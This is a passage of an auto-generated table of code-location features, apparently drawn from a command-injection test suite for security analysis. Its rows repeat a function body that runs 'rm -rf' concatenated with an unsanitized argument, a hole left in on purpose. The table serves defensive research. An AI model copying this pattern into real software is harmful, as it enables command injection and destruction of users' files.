autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | MyThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | this | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | 'arguments' object of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | exceptional return of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | assignedToPropName | myIndirectThing | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | functio ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | return of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:500:2 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:45:498:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:9 | MyThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:9 | MyThing | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:9 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:9 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:9 | MyThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:12 | MyThing.cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:12 | MyThing.cp | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:12 | MyThing.cp | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:12 | MyThing.cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:12 | MyThing.cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:17 | MyThing.cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:17 | MyThing.cp.exec | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:17 | MyThing.cp.exec | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:17 | MyThing.cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:17 | MyThing.cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | exceptional return of MyThing ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | exceptional return of MyThing ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | exceptional return of MyThing ... + name) | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | exceptional return of MyThing ... + name) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | exceptional return of MyThing ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:11:499:12 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:11:499:12 | cp | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:11:499:12 | cp | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:11:499:12 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:11:499:12 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:14:499:17 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:14:499:17 | exec | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:14:499:17 | exec | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:14:499:17 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:14:499:17 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 